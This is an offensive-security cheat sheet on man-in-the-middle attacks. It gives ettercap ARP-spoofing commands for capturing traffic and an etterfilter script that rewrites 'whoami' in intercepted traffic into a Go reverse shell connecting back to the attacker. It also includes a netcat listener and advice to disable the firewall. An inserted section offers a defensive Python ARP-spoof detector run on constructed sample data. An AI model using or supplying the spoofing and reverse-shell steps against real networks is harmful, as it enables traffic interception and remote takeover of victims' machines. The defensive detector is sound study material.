Exploit Notes

MITM (Man in the Middle) Attack

Last modified: 2022-12-01

Establish MITM

Using ARP Spoofing

On the target machine,

# -T: text-only interface
# -M: man-in-the-middle method (here: arp)
# -w: write captured traffic to a .pcap file
ettercap -T -i eth1 -M arp -w /tmp/ettercap.pcap

On your local machine, fetch ettercap's output file.

scp victim@<target-ip>:/tmp/ettercap.pcap .

# Investigate the file
wireshark ettercap.pcap
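Added example for defenders (not part of the original note): ARP spoofing as run above works by sending unsolicited ARP replies that rebind victims' IPs to the attacker's MAC, so the signals to watch are an IP whose MAC changes and one MAC that claims several IPs. The capture lines are constructed in the shape of `tcpdump -n -e arp` output; the `trusted` seeding and the alert format are this example's own choices.

```python
import re
from collections import defaultdict

# Constructed sample shaped like `tcpdump -n -e arp` output (not a real capture):
# a legitimate gateway and host, then a third MAC re-announcing both of their IPs.
SAMPLE_CAPTURE = """\
10:00:00.900000 aa:bb:cc:00:00:20 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: Request who-has 192.168.1.1 tell 192.168.1.20, length 28
10:00:01.000000 aa:bb:cc:00:00:01 > aa:bb:cc:00:00:20, ethertype ARP (0x0806), length 42: Reply 192.168.1.1 is-at aa:bb:cc:00:00:01, length 28
10:00:01.500000 aa:bb:cc:00:00:20 > aa:bb:cc:00:00:01, ethertype ARP (0x0806), length 42: Reply 192.168.1.20 is-at aa:bb:cc:00:00:20, length 28
10:00:02.000000 de:ad:be:ef:00:99 > aa:bb:cc:00:00:20, ethertype ARP (0x0806), length 42: Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28
10:00:02.100000 de:ad:be:ef:00:99 > aa:bb:cc:00:00:01, ethertype ARP (0x0806), length 42: Reply 192.168.1.20 is-at de:ad:be:ef:00:99, length 28
10:00:03.000000 de:ad:be:ef:00:99 > aa:bb:cc:00:00:20, ethertype ARP (0x0806), length 42: Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28
"""

# timestamp, claimed IP, claimed MAC from an ARP reply line; requests do not match
ARP_REPLY = re.compile(r"^(\S+) .*?Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-fA-F:]{17})")

def parse_arp_replies(text):
    """Yield (timestamp, ip, mac) for every ARP reply line in tcpdump-style text."""
    for line in text.splitlines():
        m = ARP_REPLY.match(line)
        if m:
            yield m.group(1), m.group(2), m.group(3).lower()

def detect_arp_spoof(replies, trusted=None):
    """Return alerts for IP->MAC changes and for one MAC claiming several IPs.

    `trusted` seeds known-good IP->MAC pairs (e.g. the gateway) so the very first
    poisoned reply is flagged instead of being learned as the baseline. A MAC with
    several IPs is also normal for routers with secondary addresses or VRRP, so
    treat that alert as lower confidence than an IP changing MAC.
    """
    ip_to_mac = dict(trusted or {})
    mac_to_ips = defaultdict(set)
    for ip, mac in ip_to_mac.items():
        mac_to_ips[mac].add(ip)
    alerts = []
    for ts, ip, mac in replies:
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            alerts.append(f"{ts} {ip} moved from {prev} to {mac}")
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:          # alert once per new (mac, ip) pair
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                alerts.append(f"{ts} {mac} now claims {sorted(mac_to_ips[mac])}")
    return alerts

if __name__ == "__main__":
    for alert in detect_arp_spoof(parse_arp_replies(SAMPLE_CAPTURE)):
        print(alert)
```

On a live network the same logic can be fed from `tcpdump -n -e -l arp`, or compared against a static ARP table for the gateway.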

Gain Access to a Shell

Reverse Shell Via ARP Spoofing

On the target machine, create an etterfilter script "whoami.ecf" that swaps a "whoami" command for a Go reverse shell.

// whoami.ecf
// Match TCP traffic from port 4444 whose payload contains "whoami",
// log it, and substitute the command with a Go reverse shell one-liner.
if (ip.proto == TCP && tcp.src == 4444 && search(DATA.data, "whoami")) {
    log(DATA.data, "/root/ettercap.log");
    replace("whoami", "echo 'package main;import\"os/exec\";import\"net\";func main(){c,_:=net.Dial(\"tcp\",\"<target-eth1-ip>:6666\");cmd:=exec.Command(\"/bin/sh\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go &");
    msg("###### ETTERFILTER: substituted 'whoami' with reverse shell.  ######\n");
}

Compile the file using "etterfilter".

# Compile the file using etterfilter
etterfilter whoami.ecf -o whoami.ef

Open a listener in the background.

nc -lvnp 6666 &

Allow the incoming connection through the firewall (or disable it).

ufw allow in on eth1 from <target-ip> to <target-eth1-ip> port 6666 proto tcp
# or
ufw disable

Run "ettercap" with the compiled filter.

# Run ettercap
# -F: load a compiled filter
ettercap -T -i eth1 -M arp -F whoami.ef

After a while, you should see "Connection received on <target-ip>" in the output.
If so, quit "ettercap" with "q" and bring the background listener to the foreground with "fg".
You can then interact with the target shell.
